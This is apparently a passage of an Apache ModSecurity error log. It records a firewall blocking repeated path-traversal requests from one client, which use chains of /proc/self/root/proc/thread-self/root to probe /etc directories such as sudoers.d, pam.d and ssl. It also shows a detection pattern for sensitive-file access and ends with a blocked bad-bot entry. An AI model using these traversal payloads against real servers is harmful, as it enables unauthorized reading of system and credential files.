"PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4SPAKZeKGvQeoFhlCqwAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:29.631380 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.241.46:44360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4SZqmL8PQht4WJFlATAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:30.965189 2026] [:error] [pid 7000:tid 140411624429312] [client 74.7.241.46:44374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4ShePVOt35XCGZP8lXwAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:32.283026 2026] [:error] [pid 7000:tid 140411624429312] [client 74.7.241.46:44376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4TBePVOt35XCGZP8lYQAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:33.635023 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:44382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4TQQohV2v-7oj5HHyHgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:34.797161 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.241.46:44390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4TtCmCSWTlPouqorC7AAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:36.174999 2026] [:error] [pid 6002:tid 140411632822016] [client 74.7.241.46:44392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4UPAKZeKGvQeoFhlCrwAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:38.359039 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.241.46:44408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4Ue82sZHvlq4xgHq6yQAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:39.725273 2026] [:error] [pid 32588:tid 140411699963648] [client 74.7.241.46:37656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4Uy8PwvOE6ZaeZxiF1AAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:41.075422 2026] [:error] [pid 2305:tid 140411548894976] [client 74.7.241.46:37658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4VQQohV2v-7oj5HHyIwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:42.603530 2026] [:error] [pid 32588:tid 140411699963648] [client 74.7.241.46:37666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4Vi8PwvOE6ZaeZxiF1QAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:44.145221 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.241.46:37682] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4WAQohV2v-7oj5HHyJQAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:45.705323 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.241.46:37692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4WQQohV2v-7oj5HHyJwAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:47.157180 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.241.46:37706] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4W9CmCSWTlPouqorC9wAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:48.482741 2026] [:error] [pid 1517:tid 140411716749056] [client 74.7.241.46:41392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4XGHuKRvkhJseepPafwAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:49.830905 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.241.46:41406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4XQQohV2v-7oj5HHyKgAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:51.206763 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:41414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4XweiSKl8TjouI-b6MwAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:52.447366 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.46:41426] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4YKBJNF7axNlVR0X0iQAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:53.743611 2026] [:error] [pid 32588:tid 140411699963648] [client 74.7.241.46:41442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4YS8PwvOE6ZaeZxiF2AAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:55.061579 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.241.46:41454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4YwQohV2v-7oj5HHyLAAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:56.463238 2026] [:error] [pid 1517:tid 140411565680384] [client 74.7.241.46:41468] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4ZGHuKRvkhJseepPagwAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:17:58.939954 2026] [:error] [pid 32588:tid 140411699963648] [client 74.7.241.46:41470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk4Zi8PwvOE6ZaeZxiF3AAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:18:03.876301 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.244.31:51510] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk4awQohV2v-7oj5HHyLwAAAYo"]
